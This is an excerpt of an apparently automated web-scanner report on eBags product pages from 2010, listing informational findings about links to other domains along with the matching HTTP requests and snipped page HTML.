<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">
<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" /></span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=120830&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.15. http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/product/ebags/mother-lode-tls-mini-21-wheeled-duffel/125538?productid=1325214

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_7?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_5_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-carryon.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-lifetime.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_222.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsdown.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif
http://ebags.liveclicker.com/
http://images.scanalert.com/meter/survey/www.ebags.com/63.gif
http://twitter.com/eBagsOnline
http://www.ebagscorporate.com/
http://www.facebook.com/eBags
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2febags%2fmother-lode-tls-mini-21-wheeled-duffel%2f125538&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80
http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com
https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262
https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:25 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 91539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/favicon.ico" rel="icon" type="image/x-icon" />
<meta http-equiv="P3P" content='policyref="http://www.ebags.com/w3c/p3p.xml"'>
...[SNIP]...
<a href="http://www.ebags.com/">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/badge_ebags.gif" border=0 alt=" HOME - luggage, handbags, backpacks, bags and travel accessories">
</a>
...[SNIP]...
<a href="#" class="helpLink"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/btn-needhelp.gif" alt="Need Help?" /></a>
...[SNIP]...
<a href="#" id="lnkDealOfDay" title="eBags Steal of the Day - one incredible deal, every day"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/header/btn_dealoftheday.gif" alt="Steal of the Day" border="0"></a>
...[SNIP]...
</a>
| <a href="http://ebags.liveclicker.com" class="headerLinkStyle" title="eBags Videos - View hundreds of helpful product videos">Video</a>
...[SNIP]...
<a href="#" onclick=" window.open('/blocks/dsp_non_discountable_brands.cfm','p2','height=750,width=300,scrollbars,resizable');return false" title="An extra 10%* off + Free Shipping Over $50"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/sourceids/CP_IMG_BANNER_86983639.gif" width=960 height="40" border=0>
</a>
...[SNIP]...
<a href="/"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-home.png"></a>
...[SNIP]...
<a id="lnkZoomIcon" href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=125538&ipsid=125538_3_1" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-clicktozoom.gif" border="0" /></a>
...[SNIP]...
<a href="/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=125538&ipsid=125538_3_1" target="_blank"
><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=280&wid=280" height="280" width="280" data-ipsid="125538_3_1" border="0" /></a>
</div>
<div class="md-pad10">
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_2?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_2" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_3?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_3" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_4?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_4" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_5?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_5" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_6?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_6" />
<img class="iconImage" src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_7?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=40&wid=40" data-ipsid="125538_1_7" />
</div>
...[SNIP]...
<a href="/brand/ebags"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logos/logo_222.gif" /></a>
...[SNIP]...
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_5_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Blue Yonder" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_5_1" data-skuid="1325216"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_1_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Pitch Black" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_1_1" data-skuid="1325212"></div>
<div class="productThumb"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_4_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Sinful Red" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_4_1" data-skuid="1325215"></div>
<div class="productThumb productThumb_select"><img src="http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im8/125538_3_1?resmode=4&op_usm=1,1,1,&qlt=80,1&hei=55&wid=55" alt="eBags Mother Lode TLS Mini 21'' Wheeled Duffel Green Envy" height="55" width="55" class="iconImage skuImage" data-ipsid="125538_3_1" data-skuid="1325214"></div>
...[SNIP]...
<div class="icon-sendtoafriend"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-sendtoafriend.gif" alt="Send to a Friend" /></div>
...[SNIP]...
<br />
<iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.ebags.com%2fproduct%2febags%2fmother-lode-tls-mini-21-wheeled-duffel%2f125538&layout=standard&show_faces=true&width=340&action=like&font=arial&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:340px; height:25px;" allowTransparency="true"></iframe>
...[SNIP]...
<a href="#" onclick="javascript:openSesame('/info/index.cfm?FuseAction=BOTB','Info','no','300','250','no','no','no','111','111'); return false;"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-botb.gif" /></a><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-lifetime.gif" /><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/icon-carryon.gif" />
</div>
...[SNIP]...
</script>
<a id="_lpChatBtn" href='https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262'
target='chat16136262' onclick="javascript:window.open('https://sales.liveperson.net/hc/16136262/?cmd=file&file=visitorWantsToChat&site=16136262&referrer='+escape(document.location),'chat16136262','width=475,height=400,resizable=yes');return false;">
<span class="help-icon">
...[SNIP]...
<div id="lp-Ebags-WorldClassService-div">
<img src='http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/reponline.gif' name='' border="0" /></div>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpPhone.png" width="70"
height="47" border="0" alt="Call Us 24/7" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpEmail.png" width="70"
height="50" border="0" alt="Email" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpFAQ.png" width="70" height="56"
border="0" alt="FAQ'S" /></span>
...[SNIP]...
<span class="help-icon">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/help/icon-helpSuggest.png" width="70"
height="53" border="0" alt="Have a Suggestion?" /></span>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsdown.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<div class="icon-thumbs">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/testimonials/thumbsup2.gif" />
</div>
...[SNIP]...
<a href="/info/ratings/index.cfm?fuseaction=enter&modelid=125538&testimonial_link=write_your_own"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-writeownreview.gif" /></a>
...[SNIP]...
<a href="#"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/ProductDetail/btn-backtotop.gif" width="96" height="22" alt="Back to top" /></a>
...[SNIP]...
<li><a href="http://www.facebook.com/eBags" id="fb">Join Us on Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/eBagsOnline" id="twit">Follow Us on Twitter</a>
...[SNIP]...
<li><a href="http://www.ebagscorporate.com/">Corporate Sales</a>
...[SNIP]...
<div style="padding-top:10px;"><a href="http://www.stellaservice.com/index.php?option=com_score&site=www.ebags.com" target="_blank"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/logo-stella.gif" width="61" height="39" border="0" alt="Stella Service Elite" /></a>
...[SNIP]...
<a href="javascript:openSesame('https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=www.ebags.com&lang=en','Security','no','500','450','no','yes','no','111','111')"><img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/verisignseal.gif" width="100" height="72" border="0"></a></div>
<div><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.ebags.com"><img width="65" height="37" border="0" src="//images.scanalert.com/meter/survey/www.ebags.com/63.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"></a>
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.productDetail.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dataTables.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.validation.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.deviceBagFinder.min.js?ver=1'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/jquery.validate.min.js'></script>
...[SNIP]...

4.16. http://www.ebags.com/products/view/ZoomColorsViews.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/products/view/ZoomColorsViews.cfm

Issue detail

The page was loaded from a URL containing a query string:

http://www.ebags.com/products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1

The response contains the following links to other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_2?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_1_3?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=40&wid=40
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_2_1?&op_usm=1,1,1&hei=460&wid=460
http://a1472.g.akamaitech.net/f/1472/124/36h/img.ebags.com/is/image/im0/120830_3_1?&op_sharpen=1&op_usm=1,1,1&qlt=80&hei=60&wid=60
http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/eblogo.gif

Request

GET /products/view/ZoomColorsViews.cfm?fuseaction=imagePop&ModelID=120830&ipsid=120830_3_1 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:16:12 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:16:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 9136

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="/style_IE.css" type="text/css">
<script language="JavaScript" type="text/javascript">
v
...[SNIP]...
<td valign="top" class="copy" width="109" height="70">
<img src="http://a1512.g.akamaitech.net/f/1512/124/1h/images.ebags.com/img/eblogo.gif" width="109" height="62" alt="eBags" border="0">
<br>
...[SNIP]...
<a href="#" onclick="BuildFlash('120830_1_1', 'true', 'true', '1');return false;">
